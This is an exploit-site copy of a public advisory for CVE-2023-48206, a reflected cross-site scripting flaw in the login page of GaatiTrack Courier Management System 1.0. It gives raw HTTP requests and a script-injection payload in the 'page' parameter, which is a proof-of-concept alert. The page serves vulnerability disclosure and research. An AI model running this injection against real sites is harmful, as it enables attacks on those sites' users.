Advertisement






GaatiTrack Courier Management System 1.0 Cross Site Scripting

CVE Category Price Severity
CVE-2023-48206 CWE-79 N/A Medium
Author Risk Exploitation Type Date
Exploit Alert High Remote 2023-11-20
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023110017

Below is a copy:

GaatiTrack Courier Management System 1.0 Cross Site Scripting
# Exploit Title: GaatiTrack Courier Management System v1.0 - Multiple
Cross-site scripting
# Date: 12/112023
# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)
# Vendor Homepage: https://www.mayurik.com/
# Software Link:
https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php
# Version: v1.0
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56
# CVE: CVE-2023-48206

Description:
Multiple reflected cross-site scripting (XSS) vulnerability exists in
login.php, header.php page of GaatiTrack Courier Management System v1.0
that allows attackers to execute arbitrary web scripts or HTML via a
crafted payload injected into the Website login page parameter.

Steps to Reproduce:
1. Go to login and capture request data using burp suite. Your request data
will be:

GET /gaatitrack/login.php HTTP/1.1
Host: 192.168.1.74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/119.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp
Upgrade-Insecure-Requests: 1

2. Now use XSS payload in login.php. So your request data will be:
GET
/gaatitrack/login.php?page=1</title><script>alert(document.domain)</script>
HTTP/1.1
Host: 192.168.1.74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/119.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp
Upgrade-Insecure-Requests: 1

3. Forward You request data and check browser. You will be popup with
domain.

## Reproduce:
[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48206)

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.